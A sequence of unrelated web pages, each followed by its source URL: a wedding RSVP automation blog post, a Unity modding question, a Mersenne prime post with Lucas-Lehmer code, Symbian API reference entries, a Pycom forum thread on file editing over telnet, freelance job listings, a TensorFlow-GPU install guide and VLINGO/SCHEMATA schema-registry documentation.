Automating Wedding RSVPs with Python and Google Docs

This past year I got married, and it was a blast. After months and months of planning, we lucked out and nothing major went wrong on the day of (despite some last minute rain forecasts for our outdoor venue). During the planning process, we ran into all of the usual challenges. To make matters worse, I was living in CA at the time while my fiancée was in NJ, and we were both busy with school (astrophysics Ph.D. for me, M.D. for her). Unsurprisingly, we looked for every opportunity to make the planning easier. As one example, I made an automated, online RSVP system for our wedding website. After some initial set-up, we were able to sit back and watch our master guest list (stored on our Google Drive) track the RSVP responses of our guests. And better yet, the whole thing was free. There are a lot of options out there for online RSVP forms, but nearly all of them charge some sort of fee. So, I ended up combining a bunch of free services, and using some Python to glue them together, to build our RSVP system. In this post, I'm going to outline the main steps involved in the hope that it might make wedding planning just a bit easier for some future couple. Our system relies on Google Drive for tracking RSVPs, and I've provided example (and anonymized) files here.

Using the JotForm service

To start, we need to set up the online form. There are a lot of options out there; we went with JotForm. JotForm has a free tier with 100 form submissions, and it offers several ways to increase that limit (e.g., social media follows, etc). We ended up with 200 form submissions for free, which was more than enough for us. Let's dive into the form. We'll use some Star Wars inspired names to explore the available functionality. Try entering "Luke Skywalker" into the form below, and watch the yes/no RSVP options appear. Now, try entering "Leia" into the first name box. Not only will the entry for Leia appear but also the entry for her plus one (Han Solo). Using these two types of entries, we were able to support guest RSVPs with and without accompanying plus ones. JotForm allows a lot of customization regarding the conditional logic. For example, you can set up the form so guests can also use the plus one's name — try inputting "Han" into the first name box. So, after creating a new form on JotForm, we added a new entry block to the form for each guest on our guest list and attached conditional logic to each such that the correct options were shown when the "First Name" and "Last Name" fields were filled in. Since we had roughly 150 invited guests, this was by far the most time consuming step of this whole process. I didn't find any good way of automating this step, but that would be worth exploring if you happened to have many more invited guests than we did. Finally, JotForm allows you to link the form to your Google account, and will output the submissions to a spreadsheet in your Google Drive. Unfortunately, the conditional logic used above makes the output table nearly unreadable. Each row in the spreadsheet corresponds to a different submission, and each column corresponds to a guest's name. With hundreds of invited guests, there are a lot of empty cells in need of consolidation. More on this in the next section.
Formatting the JotForm submissions with Python

To overcome the deficiencies of the JotForm output format, I wrote a short Python script to grab the Google spreadsheet output by JotForm, clean and re-format the submissions, and re-upload the results to our own master guest list. The code can be found on my GitHub. It relies on a handy little software package called df2gspread that makes managing Google spreadsheets in Python particularly easy using pandas. To get started, you'll need to set up your Google API credentials in order to query Google Drive from Python. The process is straightforward, and instructions can be found here.

Let's take a look at the format of the Google spreadsheet output by JotForm. The spreadsheet is available for browsing here. We'll load the spreadsheet into a pandas DataFrame using the unique identifier assigned to every Google spreadsheet (the long string of numbers and letters in the spreadsheet URL).

from df2gspread import gspread2df as g2d

ID1 = "1_hoBn8_0U9kurUFrr3sv6HAR_TCt2GlRL547G4ZZI7w"
raw_rsvps = g2d.download(ID1, 'Sheet1', col_names=True, row_names=False, start_cell='A1')

Let's take a peek at the first 10 rows of the raw RSVPs (note that you can scroll left to right in the output below to see all of the columns).

raw_rsvps.head(n=10)

10 rows × 120 columns

With 120 columns, this format leaves a lot to be desired. In any given row, nearly all of the columns are empty, except for those corresponding to the guest that submitted the form. The information in the table begs to be consolidated, and with just a few lines of Python, we can turn this format into something much more useful. The compute_rsvps.py script on my GitHub takes the raw JotForm output and consolidates the information into a usable format. An example spreadsheet output by the script is available as the "RSVP Submissions" sheet of this spreadsheet. Let's load this spreadsheet into a pandas DataFrame and take a look.

ID2 = "1iEAfk1cVG_PwhcwKJxUeLycUIsRhsAsp9e4xCk2qLtM"
cleaned_rsvps = g2d.download(ID2, 'RSVP Submissions', col_names=True, row_names=False, start_cell='A6')
cleaned_rsvps.head(n=10)

This format is looking much better. We've stripped out all of the unnecessary information, leaving only the submission date, guest name, RSVP, and any special requests or comments. While we could stop here, my wife and I wanted to be extra lazy and have our "master" guest list automatically updated with these RSVP responses. We'll tackle that in the next section.

Updating a master RSVP list

Managing the guest list for a wedding is notoriously difficult. After a few iterations, my wife and I found a system that worked for us. We created a "master" guest list using a spreadsheet on Google Drive that not only included guest names but also added "Expected RSVP" and "Actual RSVP" columns. We then used our Python script to update the "Actual RSVP" column. As RSVPs started to roll in, this format allowed us to quickly see how realistic our total guest count estimate was (and update our vendors accordingly). Our (anonymized) guest list spreadsheet is available as the "RSVP List" sheet of this spreadsheet. Here's a screenshot of the spreadsheet. We found the summary statistics on the right hand side of this spreadsheet to be very useful throughout the planning process. Even better, the Python script only updates the individual cells of the "Actual RSVP" column (column D above) for those guests who RSVP'ed online; a simplified sketch of the consolidation logic follows below.
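For the curious, the heart of the consolidation boils down to a few lines of pandas. This is a simplified, hypothetical sketch only; the real logic lives in compute_rsvps.py, and the "Submission Date" column name and the exact upload call are assumptions:

import pandas as pd
from df2gspread import df2gspread as d2g

# Melt the wide JotForm table (one column per guest) into one row per response.
long_form = raw_rsvps.melt(id_vars=["Submission Date"],
                           var_name="Guest", value_name="RSVP")

# Keep only the cells that actually contain a response.
consolidated = long_form[long_form["RSVP"] != ""]

# Re-upload the consolidated table. The real script instead updates only the
# individual "Actual RSVP" cells of the master list, so manually entered
# values are preserved.
d2g.upload(consolidated, ID2, wks_name="RSVP Submissions")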
So, if you are like us, and have to use traditional hard-copy RSVPs for some of your guests, you'll be able to manually update the "Actual RSVP" column for those guests without losing that information. And that's it! In practice, we embedded our JotForm RSVP form on our Squarespace website, and when JotForm alerted us via email that a new submission was received, I simply ran the compute_rsvps.py script on my laptop and our guest list was instantly updated with the new responses.

A User's Guide

To set up a version of this system for yourself, there are a few steps required. You'll need a local Python installation on your laptop (I recommend using Anaconda). The necessary steps are:

- Set up a JotForm account and clone the Wedding RSVP template form discussed in this post. The template is available here.
- For each guest on your guest list, add conditional logic to the form to show the desired Yes/No fields based on the "First Name" and "Last Name" input values.
- Add the "Google Drive" integration for your form and take note of the unique identifier of the output spreadsheet.
- Copy the "master" guest list spreadsheet template (available here) to your own Google Drive, and input your guest list on the "RSVP List" sheet. Take note of the unique identifier of the cloned spreadsheet.
- Set up Google Drive API credentials, following the instructions here.
- Download the compute_rsvps.py script from my GitHub, and make sure the dependencies are also installed (following the README on my GitHub).
- At the bottom of the compute_rsvps.py script, update the "YES" and "NO" variables with the RSVP messages you used on your form. Also, update the "JOTFORM" variable with the identifier of the spreadsheet output by JotForm (see step #3), and update the "UPLOAD" variable with the identifier of the final spreadsheet that holds the master guest list (see step #4).
- Run the compute_rsvps.py script whenever a new submission is received.
- Sit back and relax! (Or plan the rest of your wedding.)

My wife and I found this system to be very helpful for managing RSVPs, and we hope it can help simplify the wedding planning process for others. Leave a comment below if you have any questions! Thanks for reading! This post was written entirely in the Jupyter notebook. You can download this notebook, or see a static view on nbviewer.
http://nickhand.github.io/blog/pages/2018/01/10/automating-wedding-rsvps/
> Question is off-topic or not relevant

Hello! I have a particular request: I'm currently making a "training hack pack" for a Unity game I speedrun. To do so, I decompile the game files, add my lines of code and recompile them. It works well and I've been able to add many training features, but I would love to add a functionality to load any asset on demand. To load an asset, it seems that Resources.Load() is the way to go. However, I have no clue about the internal structure of the "resources" folder, since all the assets are compiled into .assets files without any reference to the original structure, so I don't know the path I need to give to the function. In the game code, Resources.Load() is never called to load an asset, so I can't mimic their paths. So my question is: in this context, is there a way to get a list of assets I can load (with their full path)?

What I've tried so far:

- I've tried to decompile files like "mainData", "resources.assets" or "sharedassetsX.assets" using several programs; I see a lot of elements I would love to load, but no paths.
- I've seen a lot of answers using "AssetDatabase" or "EditorUtility", but I don't seem to have access to those (I can't use the UnityEditor namespace in this context; remember that I decompile/recompile an existing game, I'm not in the Unity Editor).
- I've tried using a C# file browser like in this post, but the result is just a listing of all the ".assets" files that are at the root of the game folder.

Thank you =)! ~MetalFox Dioxymore

Answer by Bunny83 · Jul 16, 2018 at 12:11 PM

There may be a way to extract the resource names from Unity's internal asset format, however this question is not a development question related to game development in Unity and is therefore off-topic. You are aware of the fact that you're most likely violating the copyright of the rights holder of the game you're decompiling? It's kind of embarrassing to see script kiddies reach out to professional game developers to get assistance on their hacking.
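For what it's worth, when assets were shipped in a Resources folder, the standard runtime API looks like the sketch below. This is an illustration of the normal Resources usage, not a solution for decompiled .assets bundles: the path "Prefabs/Enemy" is invented, and Resources.LoadAll("") with an empty path simply returns every object that was under a Resources folder, which can help discover what is loadable and under which names.

using UnityEngine;

public class ResourceLister : MonoBehaviour
{
    void Start()
    {
        // An empty path returns every object packed from a Resources
        // folder at build time.
        Object[] all = Resources.LoadAll("");
        foreach (Object obj in all)
        {
            Debug.Log(obj.name + " (" + obj.GetType().Name + ")");
        }

        // Once a name is known, a single asset is loaded by its path
        // relative to the Resources folder, without the file extension.
        GameObject prefab = Resources.Load<GameObject>("Prefabs/Enemy"); // made-up path
        if (prefab != null)
        {
            Instantiate(prefab);
        }
    }
}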
https://answers.unity.com/questions/1529582/get-the-list-of-foldersprefabs-at-runtime.html
The nth Mersenne number is Mn = 2^n − 1. A Mersenne prime is a Mersenne number which is also prime. So far 51 have been found [1]. A necessary condition for Mn to be prime is that n is prime, so searches for Mersenne primes only test prime values of n. It's not sufficient for n to be prime, as you can see from the example M11 = 2047 = 23 × 89.

Lucas-Lehmer test

The largest known prime has been a Mersenne prime since 1952, with one exception in 1989. This is because there is an efficient algorithm, the Lucas-Lehmer test, for determining whether a Mersenne number is prime. This is the algorithm used by GIMPS (Great Internet Mersenne Prime Search). The Lucas-Lehmer test is very simple. The following Python code tests whether Mp is prime.

def lucas_lehmer(p):
    M = 2**p - 1
    s = 4
    for _ in range(p - 2):
        s = (s*s - 2) % M
    return s == 0

Using this code I was able to verify the first 25 Mersenne primes in under 50 seconds. This includes all Mersenne primes that were known as of 40 years ago.

History

Mersenne primes are named after the French monk Marin Mersenne (1588–1648) who compiled a list of Mersenne primes. Édouard Lucas came up with his test for Mersenne primes in 1856 and in 1876 proved that M127 is prime. That is, he found a 39-digit prime number by hand. Derrick Lehmer refined the test in 1930. As of January 2018, the largest known prime is M77,232,917.

[1] We've found 51 Mersenne primes as of December 22, 2018, but we're not sure whether we've found the first 51 Mersenne primes. We know we've found the 47 smallest Mersenne primes. It's possible that there are other Mersenne primes between the 47th and the 50th known Mersenne primes, and there may be one hiding between the 50th and 51st.
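For a quick sanity check, the function above can be run over the exponents of the first few known Mersenne primes beyond p = 2; every line should print True. Note that the test as written only applies for odd primes p, so p = 2 (M2 = 3) must be handled separately:

for p in [3, 5, 7, 13, 17, 19, 31]:
    print(p, lucas_lehmer(p))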
http://www.statsblogs.com/2018/11/28/searching-for-mersenne-primes/
#include <mw/chttpformencoder.h>

A data supplier class that is used to build up data that is to be encoded to application/x-www-form-urlencoded. A client will create an instance of this class and add name/value pairs. They then use this as the data supplier for the body of an HTTP request that is a forms submission. The name and value must both be supplied in the correct character encoding that you want to send to the server. This then gets URL-encoded.

Reimplemented from MHTTPDataSupplier::GetNextDataPart(TPtrC8 &)
Obtain a data part from the supplier. The data is guaranteed to survive until a call is made to ReleaseData().

Reimplemented from MHTTPDataSupplier::OverallDataSize()
Obtain the overall size of the data being supplied, if known to the supplier. Where a body of data is supplied in several parts this size will be the sum of all the part sizes. If the size is not known, KErrNotFound is returned; in this case the client must use the return code of GetNextDataPart to find out when the data is complete.

Reimplemented from MHTTPDataSupplier::ReleaseData()
Release the current data part being held at the data supplier. This call indicates to the supplier that the part is no longer needed, and another one can be supplied, if appropriate.

Reimplemented from MHTTPDataSupplier::Reset()
Reset the data supplier. This indicates to the data supplier that it should return to the first part of the data. This could be used in a situation where the data consumer has encountered an error and needs the data to be supplied afresh. Even if the last part has been supplied (i.e. GetNextDataPart has returned ETrue), the data supplier should reset to the first part. If the supplier cannot reset it should return an error code; otherwise it should return KErrNone, where the reset will be assumed to have succeeded.
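A minimal usage sketch, for orientation only, might look like the following. Treat it as an assumption-laden illustration: the NewL()/AddFieldL() calls follow common Symbian factory and field-adding conventions but should be verified against the SDK headers, aTransaction stands for an already-opened RHTTPTransaction, and the field names and values are made up.

// Build a form body and attach it to an HTTP POST transaction.
CHTTPFormEncoder* encoder = CHTTPFormEncoder::NewL();
CleanupStack::PushL(encoder);

// Name/value pairs, already in the character encoding for the server.
encoder->AddFieldL(_L8("username"), _L8("alice"));
encoder->AddFieldL(_L8("comment"), _L8("hello"));

// The encoder acts as the MHTTPDataSupplier for the request body.
aTransaction.Request().SetBody(*encoder);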
http://devlib.symbian.slions.net/belle/GUID-C6E5F800-0637-419E-8FE5-1EBB40E725AA/GUID-604D8C43-93F7-3835-8810-BD1CC891D086.html
Edit file through telnet possible?

Is it possible to edit files using Telnet?

@jmarcelino Oh yes, I forgot the connect command of rshell. You can also edit through that tool, with edit filename

- jmarcelino last edited by jmarcelino

@misterlisty I've had great success using the MicroPython rshell tool over telnet. After running rshell just do: connect telnet <your IP address> and you should then see the LoPy filesystem on /flash. Note that the board must be in the REPL; if it's running a script you must terminate it.

@misterlisty I'm correcting my notes: I used this little script for step a):

import sys

def getfile(path):
    print("Send file contents line by line, finish with Ctrl+C-Enter.")
    with open(path, "w") as f:
        while 1:
            try:
                l = sys.stdin.readline()
            except KeyboardInterrupt:
                break
            f.write(l)
            print(".", end="")

It does not echo, but you have to end it with an error. b) Use the command getfile("name") and then paste the content from TeraTerm (Alt-V). In TeraTerm's special settings, use a long value for the delay between lines for paste, like 100 ms. That way, I was able to upload a ~900 line Python file (the editor).

@misterlisty You might be able to upload a file in two steps. a) Upload a script which receives data & puts it into a file:

def newfile(path):
    print("Type file contents line by line, finish with EOF (Ctrl+D).")
    with open(path, "w") as f:
        while 1:
            try:
                l = input()
            except EOFError:
                break
            f.write(l)
            f.write("\n")

Push Ctrl-E, paste the few lines above, and push Ctrl-D. Then you have the function newfile in RAM. b) You can use that to upload another file. But that must be done slowly. TeraTerm has an ASCII-upload feature, which sends files line-by-line with a delay between the lines. You could use that to upload the changed files. I have an editor which works on the board. It is here:. I normally have it in flash. The editor is too large for devices w/o PSRAM to be executed from RAM. But you may be able to send your file the way sketched above.

Edit: Just tried my suggestion myself. It does not really work well. Uploading the newfile() function works, but TeraTerm does not work well in an attempt to send that file, or the LoPy stalls, at least if it's more than a few lines of code.

I forgot to open the FTP port on the router at the remote site.

@misterlisty How did you disable FTP, and can you enable it again through the REPL? I have deployed some devices in the field and have only enabled telnet instead of telnet/FTP. Can I edit a file using the REPL until I get access to them again?

- jmarcelino last edited by jmarcelino

It's possible but very cumbersome; you'd have to do it using Python on the REPL. Why not use FTP instead, which is also available?
https://forum.pycom.io/topic/2621/edit-file-through-telnet-possible/1
Code igniter php xml parser jobs

- Import 2 XML of different languages, WPML setup; site is already done.
- Can I get an infographic made up please? Thanks, Scott
- ... have an AT90USB162 demo board able to act as a select key and output the text automatically without waiting for any key press. ... [login to view URL]
- ... listens for data (basically a number) from a pressure sensor on a plugged-in USB interface and displays the data on screen. The data should be presented as numeric and as a QR code (or as 'waiting for data'). Specs for the USB pressure sensor: [login to view URL] When starting the Raspberry Pi the ...
- I have nRF24L01 modules that let me have a sensor wireless, base connected to the PC. I want to have multiple sensors that make this thing [login to view URL] and that are controlled by the LED. [login to view URL] [login to view URL]
- This is a shell program that runs on a gcc compiler, x86-64 architecture and CentOS.
- I want a program for a travelling salesman problem with high efficiency. My budget is $150 only; don't bargain and waste time.
- I need a new website. I already have a design, I just need you to build it.
- We have a working custom parser and would like to update it to support a few changes to the grammar. Candidates should have demonstrated experience in working with parsing tools. References absolutely required.
- Hi, I'm going to customize the think-cell style. 1) Do you already have experience customizing the style? 2) Do you have good knowledge of the MS Office Open XML style? Please apply if you can say "yes".
- Develop code in C# .NET to get the configuration of the systems connected over a LAN; configurations include MAC address, process ID, PC name, processor, OS and other hardware. [login to view URL] The code should be developed using Visual Studio by Microsoft.
- PHP code debugging: the code is not entering into the execute project.
- Problem Statement: Web UI views are required to be created for an existing database project. The database is defined using Code First and contains an entities schema. WebUI project requirement: required using ASP.NET MVC views. The Web UI should have List, Create, Update and Delete pages for the following entities: Customer, Customer MetaData (JSON editor required).
- I need an interpreter made in Java. Operations/requirements: database and XML, realizing the database, transactions, query operations, XML.
- ... developer. I'm trying to learn multithreading basics for image processing in C++. I come from a different API background where I've done this often and I'm trying to get my code ported to C++ using the std::thread function. This is my current pseudocode: static const int num_threads=4; void FilterImage (int x1, int x2, int x3, int threadNr) { ...
- Requirements: PHP 5.5.7 compatible (running on a Windows Server 2012, IIS); MySQL 5.0.11 compatible; jQuery 1.4.4 is available but not required; all development will need to take place on YOUR system. The deliverable should be a zip file with all needed files so that we can drop it onto our web server, with adequate in-line documentation of the code; brief ...
- ... [login to view URL] SII documentation: [login to view URL] I'm using this API ([login to view URL]) ...
- We need to purchase ... I need Android and desktop versions for multiple roulette games. I can buy at once; no backend needed, we already have it in PHP.
- Hello, guys! I am looking for someone that can build the Chrome browser source code completely. Below is a link to the source: [login to view URL] If someone can do this job, please apply.
https://www.freelancer.com/job-search/code-igniter-php-xml-parser/2/
#include <app/cntfldst.h>

Provides access to the text stored in a contact item field. An object of this class can be retrieved using CContactItemField::TextStorage().

Reimplemented from CContactFieldStorage::ExternalizeL(RWriteStream &)const
Externalises the field data.

Reimplemented from CContactFieldStorage::InternalizeL(RReadStream &)
Internalises the field data.

Reimplemented from CContactFieldStorage::IsFull()const
Tests whether the field storage contains data.

Reimplemented from CContactFieldStorage::RestoreL(CStreamStore &,RReadStream &)
Restores the field data.

Converts an array of text strings from plain text into Symbian editable text, appends them to a single descriptor, separating them with the new line character, and sets this as the text which is stored in the field. Any existing field text is replaced. The text is truncated to KCntMaxTextFieldLength characters if necessary.

Converts a text string from plain text into Symbian editable text, and sets this as the text which is stored in the field. The text is truncated to KCntMaxTextFieldLength characters if necessary.

Sets the field text. The text field object takes ownership of the specified descriptor. The function cannot leave.

Sets the field text from a descriptor array. Each descriptor in the array is appended to the text field storage. They are separated by paragraph delimiters (CEditableText::EParagraphDelimiter). Any existing text is replaced.

Sets the field text. This function allocates a new HBufC descriptor, deleting any existing one, and copies the new text into it. The function can leave.

Converts a copy of the text stored in the field from Symbian editable text format into plain text and returns it as a pointer descriptor.

Reimplemented from CContactFieldStorage::StoreL(CStreamStore &)const
Stores the field data.
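The following sketch shows how this class is typically reached through CContactItemField::TextStorage(). It is an illustration only: the construction call, the field-type UID, and the setter/getter names (SetTextL(), Text()) follow common contacts-model usage and the descriptions above, but should be verified against the SDK headers.

// Create a text field, then set and read its text through CContactTextField.
CContactItemField* field =
    CContactItemField::NewLC(KStorageTypeText, KUidContactFieldGivenName);

field->TextStorage()->SetTextL(_L("Ada"));   // allocates and copies the text
TPtrC name = field->TextStorage()->Text();   // plain-text view of the field

// ... add the field to a CContactItem, which takes ownership ...
CleanupStack::Pop(field);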
http://devlib.symbian.slions.net/belle/GUID-C6E5F800-0637-419E-8FE5-1EBB40E725AA/GUID-429B1D62-189C-3DE1-AABD-C162B0593992.html
Source: Deep Learning on Medium

I had a terrible experience installing TensorFlow-GPU on Windows 7 using pip. I followed exactly the process described in the documentation, but I had a problem with my local system's default Python version 3.7. Every time I thought I was done with the installation, I got the following error when importing TensorFlow or Keras in Python:

ImportError: DLL load failed: The specified module could not be found

I tried uninstalling Python and conda and then reinstalling everything from scratch, but ended up with the same result. Later I found an instance of my environment was pointing to the default Python (3.7) installed earlier, which was not removed when I uninstalled it. So I removed it from C:\Users\Sunil\AppData\Roaming\Python, then followed the steps below and installed successfully!! Hurray!!

First things first: install Anaconda (latest) and Python 3.6. I chose to install it in a virtual environment, as this is the recommended process. Before installing TensorFlow-GPU, make sure you satisfy the following software and hardware requirements.

Hardware: NVIDIA® GPU card with CUDA® Compute Capability 3.5 or higher (you can check here).

Software:

i) NVIDIA GPU drivers: CUDA 9.0 requires 384.x or higher. To verify this, open Control Panel → Hardware → NVIDIA Control Panel → System Information (bottom left) → Global Settings; there you can see the CUDA version.

ii) CUDA Toolkit: TensorFlow supports CUDA 9.0. Follow the instructions. You can select exe(network) or exe(local); I selected exe(network).

iii) Download cuDNN by signing up on NVIDIA Developer from here.

iv) Install cuDNN by extracting the contents of cuDNN into the Toolkit path installed in step ii. Once the download is done, open the zip file and go into the bin folder. You should see the cudnn64_7.dll file; copy it into "C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v9.0\bin".

v) Create a virtual environment for tensorflow-gpu using the following commands:

conda create --name tfgpuenv

# Activate the environment:
activate tfgpuenv

Now you'll see (tfgpuenv) in your prompt, e.g. (tfgpuenv) C:\Users\Sunil>. Then run the final command to install TensorFlow-GPU, and you are done!!!!

(tfgpuenv) C:\Users\Sunil> conda install tensorflow-gpu

vi) Test: Check that TensorFlow is properly installed and linked to the GPU with the following commands:

from tensorflow.python.client import device_lib
print(device_lib.list_local_devices())

The sample output should list your CPU and GPU devices.
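For a further sanity check, TensorFlow 1.x (the version this setup targets) can report GPU availability directly. A small sketch:

import tensorflow as tf

# Should print True when the GPU build and CUDA/cuDNN are wired up correctly.
print(tf.test.is_gpu_available())

# Logs which device each op runs on; GPU ops appear as /device:GPU:0.
sess = tf.Session(config=tf.ConfigProto(log_device_placement=True))
print(sess.run(tf.constant(42)))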
https://mc.ai/install-tensorflow-gpu-on-windows/
The VLINGO/SCHEMATA component is a schema registry. It provides the means for Bounded Contexts, à la services and applications, built using the VLINGO/PLATFORM to publish standard types that are made available to client services. The published standard types are known as schemas, and the registry hosts the schemas for given organizations and the services within. The VLINGO/SCHEMATA component supports what is known in DDD as the Published Language. If you have either of Vaughn Vernon's DDD books you can read more about Published Language in those. Still, we provide a basic overview of its uses here. A few very important points in conjunction with developing a Published Language are:

1. A Published Language should not be directly related to the internal domain model of your Bounded Context, and the internal domain model of your Bounded Context should not depend on the types defined in your Published Language. The types defined in your Published Language may be fundamentally the same or similar, but they are not the same things. Separate the two.

2. A Published Language is used for presenting API types and data in an open and well-documented way. These are used by clients to communicate with a Bounded Context, and for a Bounded Context to communicate with client services outside its boundary. Your domain model is more closely tied to the concepts learned and discovered by your team that are related to its shared mental model and specific Ubiquitous Language.

3. A Published Language is driven by the needs of Bounded Contexts (clients, or otherwise collaborating/integrating applications and services) outside your Bounded Context that need to use data to communicate and/or understand the outcomes that your Bounded Context produces. Your Published Language should be based on your Ubiquitous Language, but it may not (and often should not) share everything about its internal structure, typing, and data.

4. There is a Context Mapping strategic design pattern of DDD known as Conformist. Closely related to the previous point #3, the goal of Published Language is to prevent collaborating/integrating Bounded Contexts (clients, or otherwise collaborating/integrating applications and services) from conforming to your internal domain model. Instead they would adhere to a common standard Published Language, or even translate from a standard Published Language into their own Ubiquitous Language. If collaborators/integrators did conform directly to your Ubiquitous Language, every change in your domain model would ripple into their external Bounded Contexts, having negative maintenance impacts.

There are times when being a Conformist can be advantageous. It requires less conceptual design to adhere to another model, but with almost no flexibility in your Context. In such cases, data types used by conforming collaborators/integrators can likewise be defined inside VLINGO/SCHEMATA. Even so, here we will focus on the more inviting and flexible Published Language. One exception to the strong suggestion for your domain model to not consume types from your Published Language may be with your Domain Events. It may make sense to use these in your domain model because it can reduce the amount of mapping between Domain Events defined in your domain model and those used for persistence and messaging, for example. Still, sharing types could be problematic and good judgment should be used in deciding whether or not to do so.
This is generally a tradeoff between the development overhead of maintaining separate types and mapping them, and the runtime overhead of mapping between types and the memory management garbage that this produces. The following provides some typical use cases that are supported by the Published Language of a given Bounded Context. There may be concepts and schema structuring that are unfamiliar, but any such will be explained soon. It's most important that you now understand why the VLINGO/SCHEMATA exists and why it is used.

1. A client sends a Command request to a Bounded Context. The client must communicate that request using types and data that the Bounded Context understands. The Bounded Context defines a schema inside VLINGO/SCHEMATA such as: Org.Unit.Context.Commands.DoSomethingForMe. That Command has some data structure, such as for the REST HTTP request body payload, or for a message payload if using messaging.

2. A client sends a Query request to a Bounded Context. For example, a client sends a GET request using REST over HTTP. The Bounded Context must respond with a result, and the 200 OK response body definition is defined as a Document. That Document result is defined in VLINGO/SCHEMATA and may have a name in the following format: Org.Unit.Context.Documents.TypeThatWasQueried.

3. After use case #1 above completes, the Bounded Context emits a DomainEvent. The type and data of that outgoing DomainEvent is defined in VLINGO/SCHEMATA and may have a name in the following format: Org.Unit.Context.Events.SomethingCompleted.

4. It is possible that any one of #1, #2, and/or #3 may use additional complex data types within their definitions. These additional complex data types would be defined by the Bounded Context under Org.Unit.Context.Data, perhaps as Org.Unit.Context.Data.SomethingDataType.

5. It is possible (even likely) that any one of #1, #2, and/or #3, if based on messaging (or possibly even REST), will define one or more types within Org.Unit.Context.Envelope, such as Org.Unit.Context.Envelope.Notification. Such an Envelope type "wraps" a Command, a Document, and/or a Domain Event, and is used to communicate metadata about the incoming Command or the resulting Document and published Domain Event.

The VLINGO/SCHEMATA presents the following basic logical interface and hierarchy:

Organization
    Unit
        Context
            Commands
                Schema
                    SchemaVersion (Specification, Version, Status)
                    ...
                ...
            Data
                Schema
                    SchemaVersion (Specification, Version, Status)
                    ...
                ...
            Documents
                Schema
                    SchemaVersion (Specification, Version, Status)
                    ...
                ...
            Envelopes
                Schema
                    SchemaVersion (Specification, Version, Status)
                    ...
                ...
            Events
                Schema
                    SchemaVersion (Specification, Version, Status)
                    ...
                ...

From the top of the hierarchy the nodes are defined as follows.

Organization: The top-level division. This may be the name of a company or the name of a prominent business division within a company. If there is only one company using this registry then the Organization could be a major division within the implied company. There may be any number of Organizations defined, but there must be at least one.

Unit: The second-level division. This may be the name of a business division within the Organization, or if the Organization is a business division then the Unit may be a department or team within a business division. Note that there is no reasonable limit on the name of the Unit, so it may contain dot notation in order to provide additional organizational levels.
In an attempt to maintain simplicity we don't want to provide nested Unit types, because the Units themselves can become obsolete with corporate and team reorganizations. It's best to name a Unit according to some non-changing business function rather than physical departments.

Context: The logical application or (micro)service within which schemas are to be defined and for which the schemas are published to potential consumers. You may think of this as the name of the Bounded Context, and it may even be appropriate to name it the top-level namespace used by the Context, e.g. com.saasovation.agilepm. Within each Context there may be a number of category types used to describe its Published Language served by its Open Host Service. Currently these include: Commands, Data, Documents, Envelopes, and Events. Some of the parts are meant to help define other parts, and so are building blocks. Other parts are the highest level of the Published Language. These are called out in the following definitions.

Commands: This is a top-level schema type where Command operations, such as those supporting CQRS, are defined by schemas. If the Context's Open Host Service is REST-based, these would define the payload schema submitted as the HTTP request body of PATCH and PUT methods. If the Open Host Service is an asynchronous-message-based mechanism (e.g. RabbitMQ or Kafka), these would define the payload of Command messages sent through the messaging mechanism.

Data: This is a building-block schema type where general-purpose data records, structures, or objects are defined and that may be used inside any of the other schema types (e.g. type Token). You may also place metadata types here (e.g. type Metadata or, more specifically, type CauseMetadata).

Documents: This is a top-level schema type that defines the full payload of document-based operations, such as the query results of CQRS queries. These documents are suitable for use as REST response bodies and messaging mechanism payloads.

Envelopes: This is a building-block schema type meant to define the small number of message envelopes that wrap message-based schemas. When sending any kind of message, such as Command messages and Event messages, it is common to wrap these in an Envelope that defines some high-level metadata about the messages being sent by a sender and being received by a receiver.

Events: This is a top-level schema type that conveys the facts about happenings within the Context that are important for other Contexts to consume. These are known as Domain Events but may also be named Business Events. The reason for the distinction is that some viewpoints consider Domain Events to be internal-only events; that is, those events only of interest to the owning Context. Those holding that viewpoint think of events of interest outside the owning Context as Business Events. To avoid any confusion the term Event is used for this schema type and may be used to define any event that is of interest either inside or outside the owning Context, or both inside and outside the owning Context.

Schema: Under every top-level schema category (or type, such as Commands and Events) are any number of Schema definitions. Besides a category, a Schema has a name and description. Every Schema has at least one Schema Version, which holds the actual Specification for each version of the Schema. Thus, the Schema itself is a container for an ordered collection of Schema Versions that each have a Specification.
Schema Version: Every Schema has at least one Schema Version, and may have several versions. A Schema Version holds the Specification of a particular version of the Schema, and also holds a Description, a Semantic Version number, and a Status. The Description is a textual/prose description of the purpose of the Schema Version.

Specification: A Schema Version's Specification is a textual external DSL (code block) that declares the data types and shape of the Schema at a given version. Any new version's Specification must be backward compatible with previous versions of the given Schema if the new version falls within the same major version. The DSL is shown in detail below.

Semantic Version: A semantic version is a three-part version, with a major, minor, and patch value, with each subsequent version part separated by a dot (decimal point), such as 1.2.3 for example. Here 1 is the major version, 2 is the minor version, and 3 is the patch version. If any two Schema Versions share the same major version then it is required that their Specifications must be compatible with each other. Thus, the newer version, such as 1.2.x, must be compatible with the Specification of 1.1.x, and 1.1.x must be compatible with 1.2.x. In this, the x is any patch version.

Status: The Schema Version Status has three possible values: Draft, Published, and Removed. Draft is the initial status and means that the Specification is unofficial and may change. Dependents may still use a Draft status Schema Version for test purposes, but with the understanding that the Specification may change at any time. When a Schema Version is considered production-ready, its status is upgraded to Published. Marking a Schema Version as Published is performed manually by the Context team after it has satisfied its team and consumer dependency requirements. If, for some reason, it is necessary to forever remove a Schema Version, it can be marked as Removed status. It may then still be viewed but not used. It can only be "restored" by defining a new Schema Version with its specification, with the understanding that it may require modification to become backward compatible with any now previous version(s).

The following demonstrates all the features supported by the typing language:

{category} TypeName {
    type typeAttribute
    version versionAttribute
    timestamp timestampAttribute
    boolean booleanAttribute = true
    boolean[] booleanArrayAttribute { true, false, true }
    byte byteAttribute = 0
    byte[] byteArrayAttribute { 0, 127, 65 }
    char charAttribute = 'A'
    char[] charArrayAttribute = { 'A', 'B', 'C' }
    double doubleAttribute = 1.0
    double[] doubleArrayAttribute = { 1.0, 2.0, 3.0 }
    float floatAttribute = 1.0
    float[] floatArrayAttribute = { 1.0, 2.0, 3.0 }
    int intAttribute = 123
    int[] intArrayAttribute = { 123, 456, 789 }
    long longAttribute = 7890
    long[] longArrayAttribute = { 7890, 1234, 5678 }
    short shortAttribute = 32767
    short[] shortArrayAttribute = { 0, 1, 2 }
    string stringAttribute = "abc"
    string[] stringArrayAttribute = { "abc", "def", "ghi" }
    TypeName typeNameAttribute1
    category.TypeName typeNameAttribute2
    category.TypeName:1.2.1 typeNameAttribute3
    category.TypeName:1.2.1[] typeNameArrayAttribute1
}

